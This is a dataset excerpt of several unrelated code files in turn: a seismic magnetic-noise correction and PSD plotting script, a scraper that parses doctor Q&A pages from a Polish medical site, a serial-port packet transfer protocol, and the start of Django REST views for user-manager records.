loc,\n chan, stime, etime, attach_response = True)\n #st = read(\"/msd/\" + net + '_' + sta + '/' + str(ctime.year) + \"/\" +\n # str(ctime.julday).zfill(3) + \"/\"+ loc + \"_\" + chan + \"*\")\n\n stR = st.copy()\n stR.detrend('constant')\n st += client.get_waveforms(\"IU\", \"COLA\", \"*\",\n \"LF*\", stime, etime, attach_response = True)\n #st += read(\"/msd/\" + net + '_' + sta + '/' + str(ctime.year) + \"/\" +\n # str(ctime.julday).zfill(3) + \"/40_LF*\")\n st.detrend('constant')\n st.merge(fill_value=0)\n if loc == '10':\n paz = {'poles': [-0.037+0.037j, -0.037-0.037j], 'zeros': [0j], 'gain':1., 'sensitivity': 1.}\n else:\n paz = {'poles': [-0.01234+0.01234j, -0.01234-0.01234j], 'zeros': [0j], 'gain':1., 'sensitivity': 1.}\n #inv = read_inventory(\"/APPS/metadata/RESPS/RESP.\" + net + \".\" + sta + \".\" +\n # \"00.\" + chan)\n # The magnetic field is now interms of m/s/s/nT normalized\n for tr in st.select(location='40'):\n tr.simulate(paz_simulate=paz)\n\n # Filter and then estimate coefficents\n st.filter('bandpass', freqmin=pmax, freqmax=pmin)\n #st.normalize()\n\n\n def resi_fun(x):\n data = st.select(location=loc, channel=chan)[0].data.copy()\n for idx, tr in enumerate(st.select(location='40')):\n data -= x[idx]*tr.data.copy()\n return np.sum(data**2)/len(data)\n\n sol = fmin(resi_fun, [1., 1., 1.])\n\n\n\n def correct(x):\n data = st.select(location=loc, channel=chan)[0].data.copy()\n for idx, tr in enumerate(st.select(location='40')):\n data -= x[idx]*tr.data.copy()\n return data\n\n print(sol)\n print(resi_fun([0., 0., 0.]))\n print(resi_fun(sol))\n\n reduction = 100.*(resi_fun(sol) - resi_fun([0., 0., 0.]))/resi_fun([0., 0., 0.])\n print(chan + ' variance reduction')\n print(reduction)\n\n\n\n tr = st.select(location=loc, channel=chan)[0]\n times = tr.times()/(24*60*60)\n # plt.subplot(2,1,1)\n # plt.plot(times, tr.data,label = tr.id, alpha=0.5)\n # plt.plot(times, correct(sol),label = 'Magnetic Field Corrected', alpha=0.5)\n # plt.xlim((min(times), max(times)))\n # plt.legend()\n # plt.subplot(2,1,2)\n # for tr in st.select(location='40'):\n # plt.plot(times, tr.data,label = tr.id, alpha=0.5)\n # plt.xlim((min(times), max(times)))\n # plt.legend()\n\n # plt.savefig('Timeseries' + chan + '.png', format='PNG')\n # plt.show()\n # plt.clf()\n # plt.close()\n\n NFFT=2*2*4096\n\n\n def correct2(x):\n data = stR.select(location=loc, channel=chan)[0].data.copy()\n print(data)\n for idx, tr in enumerate(st.select(location='40')):\n data -= x[idx]*tr.data.copy()\n return data\n\n\n\n data2 = correct2(sol)\n\n print(data2)\n\n\n tr = stR.select(location=loc, channel=chan)[0]\n f, p = signal.welch(tr.data, fs = tr.stats.sampling_rate,\n nperseg=NFFT, noverlap=256)\n print(tr)\n amp, f= tr.stats.response.get_evalresp_response(tr.stats.delta, NFFT,\n output='ACC')\n\n f, pcor = signal.welch(data2, fs = tr.stats.sampling_rate,\n nperseg=NFFT, noverlap=256)\n\n # (m/s^2)^2/Hz\n p /= np.abs(amp)**2\n p=10.*np.log10(p)\n pcor /= np.abs(amp)**2\n pcor = 10.*np.log10(pcor)\n\n\n\n\n plt.semilogx(1./f, pcor, label='Corr ' + tr.stats.station + ' ' + tr.stats.location + ' ' + chan)\n plt.semilogx(1./f,p, label='Raw ' + tr.stats.station + ' ' + tr.stats.location + ' ' + chan, alpha=0.7, linestyle='dotted', linewidth=3.5)\n per, nlnm = get_nlnm()\n per, nhnm = get_nhnm()\n bper, bpow =[], []\n fil = open('GSNHmodel.csv','r')\n for line in fil:\n line = line.strip()\n line = line.replace(' ','')\n line = line.split(',')\n bper.append(float(line[0]))\n bpow.append(float(line[1]))\n fil.close()\n plt.semilogx(per, nlnm, color='k', linewidth=2)\n plt.semilogx(per, nhnm, color='k', linewidth=2, label='NLNM/NHNM')\n plt.semilogx(bper, bpow, color='.7', linewidth=2, label='GSNHM')\n #plt.axvspan(1./pmin, 1./pmax, facecolor='g', alpha=0.1)\n plt.fill_between(1./f, p, pcor,color='.5', alpha=0.7)\n plt.xlabel('Period (s)')\n plt.ylabel('PSD (dB rel. 1 $(m/s^2)^2/Hz$)', fontsize=16)\n plt.xlim((2., 1000.))\n plt.ylim((-190, -90))\n plt.legend(loc=9, ncol=2, fontsize=14)\n if idx == 0:\n plt.text(1., -85, '(a)', fontsize=18)\n else:\n plt.text(1., -85, '(c)', fontsize=18)\n\n if chan == 'LHZ':\n plt.subplot(2,2,2*idx+2)\n plt.semilogx(1./f, pcor, color = 'C4', label='Corr ' + tr.stats.station + ' ' + tr.stats.location + ' ' + chan)\n plt.semilogx(1./f,p, color = 'C5', label='Raw ' + tr.stats.station + ' ' + tr.stats.location + ' ' + chan, alpha=0.7, linestyle='dotted', linewidth=3.5) \n plt.semilogx(per, nlnm, color='k', linewidth=2)\n plt.semilogx(per, nhnm, color='k', linewidth=2, label='NLNM/NHNM')\n plt.semilogx(bper, bpow, color='.7', linewidth=2, label='GSNHM')\n #plt.axvspan(1./pmin, 1./pmax, facecolor='g', alpha=0.1)\n plt.fill_between(1./f, p, pcor,color='.5', alpha=0.7)\n plt.xlabel('Period (s)')\n plt.ylabel('PSD (dB rel. 1 $(m/s^2)^2/Hz$)', fontsize=16)\n plt.xlim((50., 1000.))\n plt.ylim((-190, -140))\n #plt.legend(loc=9, ncol=2, fontsize=14)\n if idx == 0:\n plt.text(30., -137, '(b)', fontsize=18)\n else:\n plt.text(30., -137, '(d)', fontsize=18)\n\n\nplt.savefig('figure2.png', format='PNG', dpi=200)\nplt.savefig('figure2.pdf', format='PDF', dpi=600)\n#plt.show()\n","repo_name":"aringler-usgs/magnetic_field","sub_path":"figure2.py","file_name":"figure2.py","file_ext":"py","file_size_in_byte":6942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20808488206","text":"#!/usr/bin/env python3\n\nfrom bs4 import BeautifulSoup\nfrom bs4.element import Tag\n\nfrom urllib.parse import urlparse\nimport os\n\nBASE_URL = \"https://www.znanylekarz.pl\"\nQA_DOC_URL_TEMPLATE = \"https://www.znanylekarz.pl/pytania-i-odpowiedzi/%s\"\nQA_URL_PREFIX = \"https://www.znanylekarz.pl/pytania-odpowiedzi\"\n\ndef parse_doctors_qa_urls(html_text):\n \"\"\"\n Parse doctor q&a page urls from doctor list\n\n div with dp-doctor-card class\n div with media-body class\n a with znanylekarz href\n \"\"\"\n\n dom = BeautifulSoup(html_text, \"html.parser\")\n cards = dom.find_all(\"div\", class_=\"dp-doctor-card\")\n media_bodies = [mb for card in cards for mb in card.find_all(\"div\", class_=\"media-body\")]\n urls = [a[\"href\"] for mb in media_bodies for a in mb.find_all(\"a\", href=lambda attr: attr is not None and attr.startswith(BASE_URL))]\n usernames = set()\n for url in urls:\n path = urlparse(url).path\n if len(path) == 0:\n continue\n path_components = path[1:].split(\"/\")\n if len(path_components) != 0:\n usernames.add(path_components[0])\n\n urls = [QA_DOC_URL_TEMPLATE % user for user in usernames]\n return urls\n\ndef parse_qa_urls(html_text):\n \"\"\"\n Parse question urls from znanylekarz.pl/pytania-i-odpowiedzi/\n\n a tag with href starting with znanylekarz.pl/pytania-odpowiedzi\n \"\"\"\n\n dom = BeautifulSoup(html_text, \"html.parser\")\n bodies = dom.find_all(\"p\", class_=\"question-body\")\n links = [a for body in bodies for a in body.find_all(\"a\", href=lambda attr: attr is not None and attr.startswith(QA_URL_PREFIX))]\n urls = [link[\"href\"] for link in links]\n\n return urls\n\ndef parse_qa(url, html_text):\n \"\"\"\n PYTANIA I ODPOWIEDZI\n div doctor-question-body - question\n child of div doctor-answer-content - answer\n \"\"\"\n QUESTION_CLASS = \"doctor-question-body\"\n ANSWER_CLASS = \"doctor-answer-content\"\n dom = BeautifulSoup(html_text, \"html.parser\")\n question_divs = dom.find_all(\"div\", class_=QUESTION_CLASS)\n answer_divs = dom.find_all(\"div\", class_=ANSWER_CLASS)\n\n data = []\n _, path = os.path.split(url)\n for i, div in enumerate(question_divs):\n row = {\n \"id\": f\"q{i}_{path}\",\n \"url\": url,\n \"text\": div.get_text().strip(),\n \"type\": \"question\"\n }\n data.append(row)\n\n for i, div in enumerate(answer_divs):\n children = [child for child in div.children if type(child) == Tag]\n\n for child in children:\n row = {\n \"id\": f\"a{i}_{path}\",\n \"url\": url,\n \"text\": child.get_text().strip(),\n \"type\": \"answer\"\n }\n data.append(row)\n\n return data\n","repo_name":"BlonskiP/PWR-Datascience-projects-exercises","sub_path":"Social media analysis/project-medical_sma/scraper/src/znanylekarz/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7205166321","text":"\r\nimport time\r\nimport serial\r\nimport thread\r\nimport os\r\nimport struct\r\n\r\nPACKET_OFFSET_ID = 0\r\nPACKET_OFFSET_TYPE = 1\r\nPACKET_OFFSET_PID = 2\r\nPACKET_OFFSET_SEQ = 3\r\nPACKET_OFFSET_CNT = 3\r\nPACKET_HEADER_LEN = 4\r\n#PACKET_OFFSET_CRC = 254\r\nPACKET_OFFSET_CRC = 1022\r\n#PACKET_LEN = 256\r\nPACKET_LEN = 1024\r\nCRC_LEN = 2\r\nPACKET_DATA_LEN = PACKET_LEN - PACKET_HEADER_LEN - CRC_LEN\r\n\r\nPACKET_TYPE_REQ = 0 # request data packet\r\nPACKET_TYPE_REPLY = 1 #reply packet\r\nPACKET_TYPE_ACK = 2 # acknowledge pacekt\r\nPACKET_TYPE_DATA = 3 # data packet\r\nPACKET_TYPE_QUIT = 4 # quit transfer\r\n\r\nGET_PACKET_STATE_IDLE = 0\r\nGET_PACKET_STATE_REQ = 1 \r\nGET_PACKET_STATE_WAIT_REPLY = 2 \r\nGET_PACKET_STATE_RECEIVE_DATA = 3 \r\nGET_PACKET_STATE_SEND_ACK = 4 \r\nGET_PACKET_STATE_QUIT = 5 \r\n\r\nSEND_PACKET_STATE_IDLE = 0\r\nSEND_PACKET_STATE_REPLY = 1 \r\nSEND_PACKET_STATE_SEND = 2 \r\nSEND_PACKET_STATE_WAIT_ACK = 3 \r\nSEND_PACKET_STATE_TIMEOUT = 4 \r\nSEND_PACKET_STATE_QUIT = 5 \r\n\r\n\r\ndef setup_packet_offset_dict(po_str):\r\n po_str[PACKET_OFFSET_ID] = \"PACKET_OFFSET_ID\"\r\n po_str[PACKET_OFFSET_TYPE] = \"PACKET_OFFSET_TYPE\"\r\n po_str[PACKET_OFFSET_PID] = \"PACKET_OFFSET_PID\"\r\n po_str[PACKET_OFFSET_SEQ] = \"PACKET_OFFSET_SEQ\"\r\n po_str[PACKET_OFFSET_CRC] = \"PACKET_OFFSET_CRC\"\r\n\r\ndef setup_packet_type_dict(pt_str):\r\n pt_str[PACKET_TYPE_REQ] = \"PACKET_TYPE_REQ\"\r\n pt_str[PACKET_TYPE_REPLY] = \"PACKET_TYPE_REPLY\"\r\n pt_str[PACKET_TYPE_ACK] = \"PACKET_TYPE_ACK\"\r\n pt_str[PACKET_TYPE_DATA] = \"PACKET_TYPE_DATA\"\r\n pt_str[PACKET_TYPE_QUIT] = \"PACKET_TYPE_QUIT\"\r\n\r\ndef setup_get_packet_state_dict(gps_str):\r\n gps_str[GET_PACKET_STATE_IDLE] = \"GET_PACKET_STATE_IDLE\"\r\n gps_str[GET_PACKET_STATE_REQ] = \"GET_PACKET_STATE_REQ\"\r\n gps_str[GET_PACKET_STATE_WAIT_REPLY] = \"GET_PACKET_STATE_WAIT_REPLY\"\r\n gps_str[GET_PACKET_STATE_RECEIVE_DATA] = \"GET_PACKET_STATE_RECEIVE_DATA\"\r\n gps_str[GET_PACKET_STATE_SEND_ACK] = \"GET_PACKET_STATE_SEND_ACK\"\r\n gps_str[GET_PACKET_STATE_QUIT] = \"GET_PACKET_STATE_QUIT\"\r\n\r\ndef setup_send_packet_state_dict(sps_str):\r\n sps_str[SEND_PACKET_STATE_IDLE] = \"SEND_PACKET_STATE_IDLE\"\r\n sps_str[SEND_PACKET_STATE_REPLY] = \"SEND_PACKET_STATE_REPLY\"\r\n sps_str[SEND_PACKET_STATE_SEND] = \"SEND_PACKET_STATE_SEND\"\r\n sps_str[SEND_PACKET_STATE_WAIT_ACK] = \"SEND_PACKET_STATE_WAIT_ACK\"\r\n sps_str[SEND_PACKET_STATE_TIMEOUT] = \"SEND_PACKET_STATE_TIMEOUT\"\r\n sps_str[SEND_PACKET_STATE_QUIT] = \"SEND_PACKET_STATE_QUIT\"\r\n\r\n \r\nclass xocket(object):\r\n\r\n def __init__(self, dev = \"/dev/tty/USB0\", baudrate = 115200, my_board_id = 0, target_board_id = 1, pid = 0, packet_len = 1024, out_file = \"log.txt\"):\r\n self.dev = dev\r\n self.baudrate = baudrate\r\n self.my_board_id = my_board_id\r\n self.target_board_id = target_board_id\r\n self.packet_len = packet_len\r\n self.out_file = out_file\r\n self.po_str = {}\r\n self.pt_str = {}\r\n self.gps_str = {}\r\n self.sps_str = {}\r\n self.pid = pid\r\n self.total_received_byres = 0\r\n self.total_send_bytes = 0\r\n self.receive_packet_done = False\r\n self.send_packet_done = False\r\n self.receive_state = GET_PACKET_STATE_IDLE\r\n self.send_state = SEND_PACKET_STATE_IDLE\r\n \r\n setup_packet_offset_dict(self.po_str)\r\n setup_packet_type_dict(self.pt_str)\r\n setup_send_packet_state_dict(self.sps_str)\r\n setup_get_packet_state_dict(self.gps_str)\r\n self.ser = serial.Serial(port = dev,\r\n baudrate = baudrate,\r\n parity = serial.PARITY_NONE,\r\n stopbits = serial.STOPBITS_ONE,\r\n bytesize = serial.EIGHTBITS,\r\n timeout = 1)\r\n\r\n ''' save msg to file '''\r\n def save_msg_to_file(self, msg):\r\n try:\r\n file = open(self.out_file, 'a+')\r\n file.write(msg)\r\n finally:\r\n file.close()\r\n\r\n\r\n def receive_packet(self):\r\n print(\"flyer get packet thread running\")\r\n self.receive_state = GET_PACKET_STATE_IDLE\r\n packet_total_cnt = 0\r\n packet_cnt = 0\r\n _packet_seq = 0\r\n packet_seq = 0\r\n\r\n cur_time = time.time()\r\n\r\n while True:\r\n ''' initial state, ready go! '''\r\n if (self.receive_state == GET_PACKET_STATE_IDLE):\r\n self.total_receive_bytes = 0\r\n self.receive_pacekt_done = False\r\n print(\"start to receive data...\")\r\n self.receive_state = GET_PACKET_STATE_REQ\r\n continue\r\n \r\n ''' request data from other side '''\r\n if (self.receive_state == GET_PACKET_STATE_REQ):\r\n print(\"flyer go into state GET_PACKET_STATE_REQ \")\r\n hdr = struct.pack('4B', self.target_board_id, PACKET_TYPE_REQ, self.pid, 0)\r\n\r\n packet = hdr + (PACKET_DATA_LEN + CRC_LEN) * '\\0'\r\n print (\"flyer wirte req packet len %d, target_board_id %d, type %s, pid %d,\"\r\n % (len(packet), self.target_board_id, self.pt_str[PACKET_TYPE_REQ], self.pid))\r\n print (\"write start...\")\r\n self.ser.write(packet)\r\n print(\"write done\")\r\n self.receive_state = GET_PACKET_STATE_WAIT_REPLY\r\n cur_time = time.time()\r\n continue\r\n\r\n ''' wait reply from other side '''\r\n if (self.receive_state == GET_PACKET_STATE_WAIT_REPLY):\r\n print (\"flyer go into state GET_PACKET_STATE_WAIT_REPLY\")\r\n if (cur_time + 10 < time.time()):\r\n print (\"flyer wait reply timeout 10sec... flyer goto state GET_PACKET_STATE_QUIT\")\r\n self.receive_state = GET_PACKET_STATE_QUIT\r\n continue\r\n\r\n packet = self.ser.read(PACKET_LEN)\r\n if (len(packet) < PACKET_LEN):\r\n continue\r\n\r\n '''if (crc16_check(packet) == False):\r\n state = GET_PACKET_STATE_QUIT\r\n continue\r\n '''\r\n\r\n board_id, packet_type = struct.unpack('2B', packet[:PACKET_OFFSET_TYPE+1])\r\n if (board_id != self.my_board_id or packet_type != PACKET_TYPE_REPLY):\r\n print(\"error! received packet len %d, board id: %d, expect id: %d \" %(len(packet), board_id, self.my_board_id))\r\n print (\"type: %d, expected type: %s\" %(packet_type, self.pt_str[PACKET_TYPE_REPLY]))\r\n self.receive_state = GET_PACKET_STATE_QUIT\r\n continue\r\n \r\n pid, packet_total_cnt = struct.unpack('2B', packet[PACKET_OFFSET_PID:PACKET_OFFSET_CNT+1])\r\n if (packet_total_cnt <= 0 or pid != self.pid):\r\n print(\"receive reply from station, packet total cnt %d\" %(packet_total_cnt))\r\n self.receive_state = GET_PACKET_STATE_QUIT\r\n continue\r\n \r\n print(\"receive reply from station, board_id: %d, packet_type: %s, _pid: %d, packet_total_cnt %d\"\r\n %(board_id, self.pt_str[packet_type], pid, packet_total_cnt))\r\n \r\n self.receive_state = GET_PACKET_STATE_SEND_ACK\r\n\r\n ''' receive data state '''\r\n if (self.receive_state == GET_PACKET_STATE_RECEIVE_DATA):\r\n print (\"flyer go into state GET_PACKET_STATE_RECEIVE_DATA\")\r\n packet = self.ser.read(PACKET_LEN)\r\n\r\n if (len(packet) < 4):\r\n if (cur_time + 1 < time.time()):\r\n print (\"flyer receive date timeout 1sec...\")\r\n continue\r\n\r\n board_id, packet_type = struct.unpack('2B', packet[:PACKET_OFFSET_TYPE+1])\r\n if (board_id != self.my_board_id or packet_type != PACKET_TYPE_DATA):\r\n print(\"rcving error! packet id: %d, type %d, expect id: %d, type %s \"\r\n %(board_id, packet_type, FLYER_BOARD_ID, self.pt_str[PACKET_TYPE_DATA]))\r\n self.receive_state = GET_PACKET_STATE_QUIT\r\n continue\r\n\r\n pid, packet_seq = struct.unpack('2B', packet[PACKET_OFFSET_PID:PACKET_OFFSET_SEQ+1])\r\n if (pid != self.pid or packet_seq != _packet_seq):\r\n print(\"rcving error! packet pid: %d, seq: %d, expected pid: %d, seq %d\" %(pid, packet_seq, _pid, _packet_seq))\r\n self.receive_state = GET_PACKET_STATE_QUIT\r\n continue\r\n\r\n print(\"receive data from station, board_id: %d, packet_type: %s, pid: %d, packet_seq %d\"\r\n %(board_id, self.pt_str[packet_type], pid, packet_seq))\r\n\r\n msg = packet[PACKET_OFFSET_SEQ + 1: PACKET_LEN - CRC_LEN]\r\n\r\n #print (\"#flyer recved len: %d, msg: %s\"\r\n # %(PACKET_LEN - CRC_LEN - PACKET_OFFSET_SEQ - 1, msg))\r\n\r\n self.save_msg_to_file(packet[PACKET_OFFSET_SEQ+1: PACKET_LEN - CRC_LEN])\r\n self.total_receive_bytes += len(packet)\r\n _packet_seq += 1\r\n self.receive_state = GET_PACKET_STATE_SEND_ACK\r\n\r\n\r\n if (self.receive_state == GET_PACKET_STATE_SEND_ACK):\r\n print (\"flyer go into state GET_PACKET_STATE_SEND_ACK \")\r\n packet = struct.pack(\"4B\", self.target_board_id, PACKET_TYPE_ACK, self.pid, packet_seq)\r\n \r\n packet = packet + (PACKET_DATA_LEN + CRC_LEN - 4) * '1'\r\n packet += \"phdc\"\r\n print (\"media wirte ACK packet len %d, target_board_id %d, packet_type:%s, pid %d, _packet_seq %d,\"\r\n % (len(packet), self.target_board_id, self.pt_str[PACKET_TYPE_ACK], self.pid, packet_seq))\r\n\r\n self.ser.write(packet)\r\n\r\n if (_packet_seq == packet_total_cnt):\r\n print(\"flyer recevie data ok, return\")\r\n ''' !!!delay for a while, waitting for the serial send all the data out '''\r\n time.sleep(2)\r\n self.receive_packet_done = True\r\n \r\n return True\r\n else:\r\n self.receive_state = GET_PACKET_STATE_RECEIVE_DATA\r\n continue\r\n\r\n\r\n ''' end the transfer '''\r\n if (self.receive_state == GET_PACKET_STATE_QUIT):\r\n print (\"flyer go into GEP_PACKET_STATE_QUIT\")\r\n self.receive_packet_done = False\r\n print (\"flyer_get_packet thread exit...\")\r\n time.sleep(0.1)\r\n return False\r\n\r\n\r\n def receive_packet_is_done(self):\r\n return self.receive_packet_done\r\n\r\n\r\n def received_bytes(self):\r\n return self.total_receive_bytes\r\n\r\n\r\n def is_request_packet(self, packet):\r\n board_id, packet_type = struct.unpack(\"2B\", packet[:PACKET_OFFSET_TYPE+1])\r\n if (board_id != self.my_board_id or packet_type != PACKET_TYPE_REQ):\r\n print (\"wrong packet,len %d, board id %d, type %d, expect board_id %d, packet_tyep %s\"\r\n %(len(packet), board_id, packet_type, self.my_board_id, self.pt_str[PACKET_TYPE_REQ])) \r\n return False\r\n else:\r\n print(\"station receive one request packet, board_id %d, packet_type %s\"\r\n %(board_id, self.pt_str[packet_type]))\r\n return True\r\n\r\n ''' before go into send_packet, we have got pid and target board id from the request packet ''' \r\n def send_packet(self, in_file_name, pid):\r\n self.pid = pid\r\n self.send_state = SEND_PACKET_STATE_REPLY\r\n self.send_packet_done = False\r\n sendfile = open(in_file_name, 'rb')\r\n file_size = os.path.getsize(in_file_name)\r\n packets_cnt = (file_size + PACKET_DATA_LEN - 1) / PACKET_DATA_LEN\r\n send_packet_cnt = 0\r\n last_packet_size = file_size % PACKET_DATA_LEN\r\n print(\"file size %d, packets_cnt %d, last_packet_size %d\" %(file_size, packets_cnt, last_packet_size))\r\n _packet_seq = 0\r\n\r\n while True:\r\n if (self.send_state == SEND_PACKET_STATE_REPLY):\r\n print(\"station go inot state SEND_PACKET_STATE_REPLY\")\r\n packet = struct.pack(\"4B\", self.target_board_id, PACKET_TYPE_REPLY, self.pid, packets_cnt)\r\n packet = packet + (PACKET_DATA_LEN + CRC_LEN) * '\\0'\r\n print (\"station send packet len %d, target_board_id %d, type %s, pid %d, packets_cnt %d\"\r\n %(len(packet), self.target_board_id, self.pt_str[PACKET_TYPE_REPLY], self.pid, packets_cnt))\r\n \r\n self.ser.write(packet)\r\n\r\n if (packets_cnt <= 0):\r\n self.send_state = SEND_PACKET_STATE_QUIT\r\n\r\n self.send_state = SEND_PACKET_STATE_WAIT_ACK\r\n continue\r\n\r\n if (self.send_state == SEND_PACKET_STATE_WAIT_ACK):\r\n print(\"station go into state SEND_PACKET_STATE_WAIT_ACK\")\r\n packet = self.ser.read(PACKET_LEN)\r\n if (len(packet) < PACKET_LEN):\r\n continue\r\n\r\n board_id, packet_type, pid, packet_seq = struct.unpack(\"4B\", packet[: PACKET_OFFSET_SEQ+1])\r\n print(\"station receive ACK, packe len %d, board_id %d, packet_type %d, pid %d, packet_seq %d\"\r\n %(len(packet), board_id, packet_type, pid, packet_seq))\r\n \r\n if (board_id != self.my_board_id or packet_type != PACKET_TYPE_ACK):\r\n print (\"received packet len %d, board_id %d, packet type %d, expected board_id %d, packet_type: %s\"\r\n %(len(packet), board_id, packet_type, self.my_baord_id, self.pt_str[PACKET_TYPE_ACK]))\r\n \r\n self.send_state = SEND_PACKET_STATE_QUIT\r\n continue\r\n\r\n print (\"send packet cnt %d\" %(send_packet_cnt))\r\n if (send_packet_cnt == packets_cnt):\r\n print(\"station send %d packets done\" %(send_packet_cnt))\r\n \r\n self.send_packet_done = True\r\n return True\r\n\r\n self.send_state = SEND_PACKET_STATE_SEND\r\n continue\r\n\r\n if (self.send_state == SEND_PACKET_STATE_SEND):\r\n print(\"sttion go into state SEND_PACKET_STATE_SEND\")\r\n packet = struct.pack(\"4B\", self.target_board_id, PACKET_TYPE_DATA, self.pid, _packet_seq)\r\n if (send_packet_cnt != packets_cnt - 1):\r\n crc_str = CRC_LEN * '\\0'\r\n msg = sendfile.read(PACKET_DATA_LEN)\r\n #print (\"#station sen len %d, msg:%s\" %(len(msg), msg))\r\n packet = packet + msg + crc_str\r\n else:\r\n packet = packet + sendfile.read(last_packet_size) + (PACKET_LEN - len(packet) - last_packet_size) * '\\0'\r\n\r\n self.ser.write(packet)\r\n\r\n print(\"station send data, len %d, target_board_id %d, type %s, pid %d, seq %d\"\r\n %(len(packet), self.target_board_id, self.pt_str[PACKET_TYPE_DATA], pid, _packet_seq))\r\n \r\n self.total_send_bytes += len(packet)\r\n send_packet_cnt += 1\r\n _packet_seq += 1\r\n\r\n self.send_state = SEND_PACKET_STATE_WAIT_ACK\r\n continue\r\n\r\n if (self.send_state == SEND_PACKET_STATE_QUIT):\r\n print(\"station go into state SEND_PACKET_STATE_QUIT\")\r\n print (\"station_send_packet thread exit...\")\r\n return False\r\n\r\n def send_bytes(self):\r\n return self.total_send_bytes\r\n\r\n def send_packet_is_done(self):\r\n return self.send_packet_done\r\n\r\n \r\n\r\ndef receive_packet_thread(xock):\r\n return xock.receive_packet()\r\n\r\ndef request_packet(port, target_board_id, board_id, pid):\r\n \r\n if not port:\r\n port = \"/dev/ttyUSB0\"\r\n \r\n xock = xocket(port, baudrate = 115200, target_board_id = target_board_id, pid = pid,\r\n my_board_id = board_id)\r\n \r\n thread.start_new_thread(receive_packet_thread, (xock,))\r\n cur_time = time.time()\r\n while time.time() < cur_time + 20.0:\r\n time.sleep(0.01)\r\n if (xock.receive_packet_is_done()):\r\n time_interval = time.time() - cur_time\r\n received_bytes = xock.received_bytes()\r\n print(\"receive %d bytes in %.3f\" %(received_bytes, time_interval))\r\n print(\"speed: %.2fKB/s\" %((received_bytes/1000)/time_interval))\r\n print(\"\\r\\nreceive packet done ok\\r\\n\")\r\n return True\r\n\r\n print (\"recevie packet timeout...\")\r\n return False\r\n \r\n \r\ndef send_packet_thread(xock, file_name, pid):\r\n return xock.send_packet(file_name, pid)\r\n\r\ndef reply_packet(port, target_board_id, board_id, send_file_name):\r\n\r\n if not port:\r\n port = \"/dev/ttyUSB0\"\r\n \r\n xock = xocket(dev = port, baudrate = 115200, target_board_id = target_board_id,\r\n my_board_id = board_id)\r\n\r\n while True:\r\n print(\"waiting for request packet\")\r\n \r\n packet = xock.ser.read(PACKET_LEN)\r\n if (len(packet) < PACKET_LEN):\r\n continue\r\n\r\n if (xock.is_request_packet(packet)):\r\n board_id, packet_type, pid = struct.unpack(\"3B\", packet[:PACKET_OFFSET_PID+1])\r\n thread.start_new_thread(send_packet_thread, (xock, send_file_name, pid)) \r\n cur_time = time.time()\r\n wait_delay = 20.0\r\n while time.time() < cur_time + wait_delay:\r\n time.sleep(0.01)\r\n if (xock.send_packet_is_done()):\r\n time_interval = time.time() - cur_time\r\n send_bytes = xock.send_bytes()\r\n print(\"send %d bytes in %.3f\" %(send_bytes, time_interval))\r\n print(\"speed: %.2fKB/s\" %((send_bytes/1000)/time_interval))\r\n print(\"\\r\\n send packet done ok\\r\\n\")\r\n break\r\n \r\n if (time.time <= cur_time + wait_delay):\r\n print (\"send packet timeout...\")\r\n \r\n\r\n\r\n\r\n","repo_name":"eastmoutain/python_serial_protocol","sub_path":"xocket.py","file_name":"xocket.py","file_ext":"py","file_size_in_byte":18497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33398766898","text":"\"\"\"\nViews for User Manager Application.\n\"\"\"\nfrom __future__ import absolute_import, unicode_literals\n\nfrom rest_framework import status\nfrom rest_framework.exceptions import NotFound\nfrom rest_framework.generics import ListAPIView, ListCreateAPIView\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\nfrom django.contrib.auth.models import User\nfrom django.db.models import Q\n\nfrom ...models import UserManagerRole\nfrom .serializers import ManagerListSerializer, ManagerReportsSerializer, UserManagerSerializer\n\n\ndef _filter_by_manager_id_or_email(queryset, identifier):\n \"\"\"\n Filters provided ``queryset`` by ``manager_id``.\n Here ``manager_id`` can be a username or email address.\n\n Args:\n queryset(QuerySet): UserManagerRole queryset\n identifier(str): username or email address of manager\n Returns:\n queryset filtered by manager\n \"\"\"\n\n if identifier is None:\n return queryset\n elif '@' in identifier:\n return queryset.filter(\n Q(manager_user__email=identifier) | Q(unregistered_manager_email=identifier),\n )\n else:\n return queryset.filter(\n manager_user__username=identifier,\n )\n\n\ndef _filter_by_user_id_or_email(queryset, identifier):\n \"\"\"\n Filter ``queryset`` by ``identifier``, where ``identifier`` can be a username or email address.\n\n Args:\n queryset(QuerySet): UserManagerRole queryset\n identifier(str): username or email address of user\n Returns:\n queryset filtered by user\n \"\"\"\n\n if identifier is None:\n return queryset\n elif '@' in identifier:\n return queryset.filter(user__email=identifier)\n else:\n return queryset.filter(user__username=identifier)\n\n\nclass ManagerViewMixin(object):\n \"\"\"\n Provide common functionality for all manager views.\n \"\"\"\n\n permission_classes = (IsAuthenticated,)\n\n @property\n def authentication_classes(self): # pragma: no cover\n \"\"\"\n Allow users authenticated via OAuth2 or normal session authentication.\n \"\"\"\n from openedx.core.lib.api import authentication # pylint: disable=import-error\n return [\n authentication.OAuth2AuthenticationAllowInactiveUser,\n authentication.SessionAuthenticationAllowInactiveUser,\n ]\n\n\nclass ManagerListView(ManagerViewMixin, ListAPIView):\n \"\"\"\n **Use Case**\n\n * Get a list of all users that are managers for other users\n\n **Get Request**\n\n GET /api/user_manager/v1/managers/\n\n **GET Parameters**\n\n None\n\n **GET Response**\n\n If the request for information about the managers is successful, an HTTP 200 \"OK\"\n response is returned with a collection of managers.\n\n The HTTP 200 response has the following values.\n\n * count: The number of managers in a course.\n\n * next: The URI to the next page of results.\n\n * previous: The URI to the previous page of results.\n\n * num_pages: The number of pages.\n\n * results: a list of manager users:\n\n * id: The user id for a manager user, or null if manager doesn't have an\n account yet.\n\n * email: Email address of manager.\n\n **Get Response Example**\n\n ::\n\n {\n \"count\": 99,\n \"next\": \"https://courses.example.com/api/user_manager/v1/managers/?page=2\",\n \"previous\": null,\n \"results\": {\n {\n \"email\": \"staff@example.com\",\n \"username\": \"staff\"\n },\n { ... }\n }\n }\n \"\"\"\n\n serializer_class = ManagerListSerializer\n queryset = UserManagerRole.objects.values(\n 'manager_user__username',\n 'manager_user__email',\n 'unregistered_manager_email',\n ).distinct()\n\n\nclass ManagerReportsListView(ManagerViewMixin, ListCreateAPIView):\n \"\"\"\n **Use 